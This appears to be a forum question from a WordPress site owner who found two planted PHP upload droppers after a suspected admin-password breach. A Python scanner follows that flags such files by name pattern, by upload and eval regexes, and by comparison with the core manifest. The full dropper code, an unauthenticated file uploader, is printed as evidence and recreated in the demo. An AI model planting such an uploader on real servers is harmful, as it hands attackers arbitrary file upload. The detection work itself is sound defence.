This morning I've come across some suspicious files on my server within the WordPress wp-admin/user directory:
File comment-zk9YV7.php
<?php
if(move_uploaded_file($_FILES["Wpfl"]["tmp_name"], basename($_FILES["Wpfl"]["name"]))){
echo (basename($_FILES["Wpfl"]["name"])." Success");
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\">
<input type=\"file\" name=\"Wpfl\"/>
<input type=\"submit\" value=\"fup\"/>
</form>
</br>task is done!";
?>
And a file, comment-JR9hng.php, consisting of the same code.
I have long suspected a breach a couple of weeks ago, and while this file by itself seems somewhat harmless, I can't help but imagine that there is something bigger going on.
I have since checked over the server and found nothing, but maybe I wasn't looking in the right place. My theory is that because one of the WordPress administrators had a very weak password, the WordPress administrator account was accessed. Around a week ago, we also had a bunch of spam posts from the WordPress backend, promoting some scams and malicious links. I suspect this was once again due to the very-easy-to-guess passwords.
What can I do? Are there some pointers where to look next?
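One concrete "where to look next" step is to sweep the whole install for more files like the two above. The script below is an added example (not code from the question's author and not a WordPress or WP-CLI tool); it walks a WordPress tree and flags PHP files on three grounds taken from the post: the `comment-XXXXXX.php` name pattern, a `move_uploaded_file($_FILES...)` upload handler, and a PHP file sitting inside `wp-admin/` or `wp-includes/` that is not in the release's file list (`wp-admin/user/` is a real core directory, so location alone proves nothing; the manifest comparison is what matters). The `eval`/`base64_decode` indicators and the miniature install it builds in a temp directory are constructed assumptions for the demo; in practice the manifest comes from WordPress' core checksums (`wp core verify-checksums` does this comparison for you).

```python
import re
import tempfile
from pathlib import Path

# Content indicators. The first is taken directly from the dropper in the question
# (move_uploaded_file fed from $_FILES); the other two are assumed, common
# companions in planted PHP files.
SUSPICIOUS_PATTERNS = {
    "upload handler fed from $_FILES": re.compile(r"move_uploaded_file\s*\(\s*\$_FILES", re.I),
    "dynamic code execution (eval)": re.compile(r"\beval\s*\(", re.I),
    "encoded payload (base64_decode)": re.compile(r"\bbase64_decode\s*\(", re.I),
}

# Name pattern of the two files found in the question: comment-<6 chars>.php
DROPPER_NAME = re.compile(r"^comment-[A-Za-z0-9]{6}\.php$")

# Core trees where every PHP file should appear in the release manifest.
CORE_DIRS = ("wp-admin", "wp-includes")


def scan_tree(root, core_manifest):
    """Walk a WordPress install and return {relative_path: [reasons]} for PHP
    files that look planted. core_manifest is the set of relative paths that ship
    with the installed release (here a constructed stand-in)."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        reasons = []
        if DROPPER_NAME.match(path.name):
            reasons.append("file name matches comment-XXXXXX.php")
        if rel.split("/", 1)[0] in CORE_DIRS and rel not in core_manifest:
            reasons.append("PHP file in core tree not present in release manifest")
        try:
            text = path.read_text(errors="replace")
        except OSError:
            text = ""
        for label, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(text):
                reasons.append(label)
        if reasons:
            findings[rel] = reasons
    return findings


def build_sample_install():
    """Constructed miniature WordPress tree for a stand-alone demo: two core
    file stand-ins, a copy of the dropper from the question, and a plugin file
    that legitimately calls move_uploaded_file behind a capability check (so that
    hit is a lead to review, not proof of compromise)."""
    root = Path(tempfile.mkdtemp(prefix="wp-demo-"))
    manifest = {"wp-admin/admin.php", "wp-includes/pluggable.php"}
    for rel in manifest:
        f = root / rel
        f.parent.mkdir(parents=True, exist_ok=True)
        f.write_text("<?php\n// core file stand-in\n")
    dropper = root / "wp-admin/user/comment-zk9YV7.php"
    dropper.parent.mkdir(parents=True, exist_ok=True)
    dropper.write_text(
        '<?php\nif(move_uploaded_file($_FILES["Wpfl"]["tmp_name"], '
        'basename($_FILES["Wpfl"]["name"]))){ echo "Success"; }\n'
    )
    plugin = root / "wp-content/plugins/gallery/upload.php"
    plugin.parent.mkdir(parents=True, exist_ok=True)
    plugin.write_text(
        "<?php\nif (!current_user_can('upload_files')) { wp_die(); }\n"
        "move_uploaded_file($_FILES['img']['tmp_name'], $dest);\n"
    )
    return root, manifest


if __name__ == "__main__":
    root, manifest = build_sample_install()
    for rel, reasons in scan_tree(root, manifest).items():
        print(f"{rel}: {', '.join(reasons)}")
```

Run it against the real document root instead of the demo tree by calling `scan_tree("/path/to/wordpress", manifest)` with a manifest built from the core checksum list for your exact version; anything it flags under `wp-content/uploads/` or in a core directory deserves a look at its mtime and at the access log around that time, since the dropper above leaves a trail of POST requests to its own path.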